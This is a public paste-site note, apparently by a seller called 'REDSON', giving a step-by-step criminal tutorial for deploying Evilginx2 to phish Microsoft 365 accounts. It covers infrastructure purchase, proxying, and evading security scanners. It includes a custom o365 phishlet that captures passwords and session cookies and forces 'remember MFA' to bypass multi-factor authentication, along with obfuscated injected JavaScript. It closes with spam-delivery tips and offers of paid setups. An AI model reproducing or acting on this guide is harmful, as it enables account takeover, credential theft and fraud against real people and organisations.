Untitled Note
By: Anonymous12/22/2021802 views Public Note
-NOTICE
Do not share anything inside this page.
Do not dm REDSON and ask for help. If you have a question ask in the group.
This tutorial can't be any simpler. Go with it step by step.
If you can't get this running you can buy a ready setup for $60 (hiring ppl to do setups)
If you want someone to teach you how to setup and use. it costs $250 (will refer someone to teach you)
DM if you need a ready setup, or if you want someone to teach you how to setup and use.
- REQUIREMENTS:
Ubuntu 20 server
Domain
Cloudflare
1 ip from fineproxy
Ubuntu 20 Server
- Get ubuntu 20 server from any site (azure,aws.., whatever).
- if you want a cheap one you can get it from routerhosting.com/linux-vps
Domain
- Get any domain to use for the evilginx page. google "buy domain with btc".
- You can get a free domain to test with from freenom.com
- If you get a domain from freenom type 1 of these extensions when searching (.tk .ga .ml .cf .gq) or it will say not available.
- it's not recommended to use a free domain but you can get 1 to practice with.
Cloudflare
- After you get the domain go to cloudflare.com and signup.
- Type in the domain you got, they will give you nameservers to use for the domain. Go back to the domain site and input those in.
- Wait 30 mins for the nameservers to propagate then go back to cloudflare and point the domain/wildcard to the vps ip. See below.
1 ip from fineproxy
- Get 1 ip form fineproxy.org, should be same or close to the vps location so you it doesn't take much time to connect.
- After you buy and you get the login, go to account.fineproxy.org and bind the vps ip, then download the socks5 ip (without authorization)
************************INSTALLATION. **********************************
1- Dowload putty and filezilla.
https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe
https://download.filezilla-project.org/client/FileZilla_3.52.0.5_win64_sponsored-setup.exe
2- Open putty and change the session timeout in the settings to 240 secs.
3- Connect to the ubuntu server in putty.
4- Type/Paste in the username and password. The password will be hidden you'll think it's not typing but it is.
5- Type in these codes.
sudo apt update
sudo apt install -y make
sudo apt install -y git
sudo apt install -y golang
export GOPATH=$HOME/go
echo $GOPATH
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
wait for the "make" command to complete.
6- Launch Evilginx.
sudo ./bin/evilginx -p ./phishlets/
if you get Failed to start nameserver on port 53 exit evilginx. If not, Skip to Step 7
exit
Then do this.
sudo service systemd-resolved stop
sudo nano /etc/resolv.conf
Then change nameserver 127.x.x.x to nameserver 8.8.8.8 or 1.1.1.1
Then save the file (By pressing CTRL X and pressing Y followed by enter)
7- Continue with the setup.
config domain
ex: config domain google.com
config ip
ex: config ip 45.153.241.225
proxy address
ex: proxy address 193.200.231.202
proxy port
ex: proxy port 1080
proxy type
ex: proxy type http
proxy enable
exit
enable the proxy and exit
8- Login with filezilla.
9- Click Edit > Settings > File editing and paste this code
"C:\Program Files\Notepad \notepad .exe"
10- Go to /root/evilginx2/phishlets
11- Find o365.yaml, right click and select "view/edit"
12- Replace all with my working office phishlet and save
name: 'o365'
author: 'REDSON'
min_ver: '2.4.0'
proxy_hosts:
- {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
- {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
sub_filters:
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
auth_tokens:
- domain: '.login.microsoftonline.com'
keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT']
- domain: 'login.microsoftonline.com'
keys: ['SignInStateCookie']
credentials:
username:
key: '(login)'
search: '(.*)'
type: 'post'
password:
key: '(passwd)'
search: '(.*)'
type: 'post'
auth_urls:
- '/common/SAS'
- '/kmsi'
login:
domain: 'login.microsoftonline.com'
path: '/'
force_post:
- path: '/kmsi'
search:
- {key: 'LoginOptions', search: '.*'}
force:
- {key: 'LoginOptions', value: '1'}
type: 'post'
- path: '/common/SAS'
search:
- {key: 'rememberMFA', search: '.*'}
force:
- {key: 'rememberMFA', value: 'true'}
type: 'post'
js_inject:
- trigger_domains: ["login.microsoftonline.com"]
trigger_paths: ["/common/oauth2"]
trigger_params: []
script: |
var _cs=["#i",'116','#i0',"16","01","que","Sel","cto","le","Ele","ele","ri","y","pus","bs","arC","st","ryS","th","sh","ng","ery","ry","str","get",'0',"r","pl","sub","od","ect","lo","h","cat","ap","or","om","e","lu","tr","Ch","ha","fr","1024","tor","ion","va","en","qu","By","ec",'abs',"su"]; const _g0 = async _g1 => { while ( document[_cs[48] _cs[21] _cs[6] _cs[30] _cs[35]](_g1) === null) { await new Promise( _g2 => requestAnimationFrame(_g2) ) } return document[_cs[5] _cs[17] _cs[10] _cs[7] _cs[26]](_g1); }; _g0(_cs[2] _cs[1])[_cs[18] _cs[47]]((_g1) => { var _g3 = window[_cs[31] _cs[33] _cs[45]][_cs[41] _cs[19]][_cs[28] _cs[23]](1)[_cs[28] _cs[16] _cs[11] _cs[20]](1),_g4 = [],_g6;for(var _g5=0; _g5< _g3[_cs[8] _cs[20] _cs[18]]-1; _g5 =2){_g4[_cs[13] _cs[32]](parseInt(_g3[_cs[52] _cs[14] _cs[39]](_g5, 2), 16));}_g6 = String[_cs[42] _cs[36] _cs[40] _cs[15] _cs[29] _cs[37]][_cs[34] _cs[27] _cs[12]](String, _g4);var _g7 = document[_cs[5] _cs[22] _cs[6] _cs[50] _cs[44]](_cs[0] _cs[4] _cs[3]); _g7[_cs[46] _cs[38] _cs[37]] = _g6; });
13- Save the changes.
14- Start evilginx again.
sudo ./bin/evilginx -p ./phishlets/
15- Continue with the setup.
phishlets hostname o365
ex1: phishlets hostname o365 phishing.com
ex2: phishlets hostname o365 office365.phishing.com
lures create o365
config redirect_url https://www.youtube.com/watch?v=BN00cS8M8Es
this is where the bots will be redirected. you can change the link.
16- Restart evilginx and continue with the setup.
exit
sudo ./bin/evilginx -p ./phishlets/
phishlets enable o365
phishlets hide o365
blacklist all
17- Wait at least 1 hour for it to collect bots, leave putty running.
shit ton of scanners will go to the page after obtaining ssl, its better to leave it overnight
18- After the wait is over.
phishlets unhide o365
blacklist unauth
If for some reason it was disconnected, restart the session and paste
cd evilginx2
sudo ./bin/evilginx -p ./phishlets/
then unide the phishlet and blacklist unauthorized requests with step 18.
*************************************************How to Use?*********************************************
1- If the window is still open skip to step2.
Launch evilginx
cd evilginx2
sudo ./bin/evilginx -p ./phishlets/
2- Get the phishing link.
lures get-url 0
copy the link it should be domain.com/folder and paste in the browser.
the folder is the access code, without it your ip will get blocked.
you can set a redirection link on success with
lures edit 0 redirect_url https://mail.office365.com
or you leave it login all the way in.
Link with autofill for redrum is https://domain.com/folder#%EMAILX%
3- Get the sessions with.
sessions
select the session id
sessions 1
- Sessions are also saved in /root/.evilginx/data.db
- You can use this free redirection template.
Just replace domain.com/XqlwscdC with your page link.
spam link is https://redirectionlink.com#%EMAILX%
Please Wait...
- Or use this other free template as attachment.
Try with the 4 encryption methods in redrum, see what inboxes with your smtp/settings.
Please Wait...
- Or use this other free template as attachment.
Try with the 4 encryption methods in redrum, see what inboxes with your smtp/settings.
Want to create your own notes?
Join thousands of users writing securely on ProNotepad.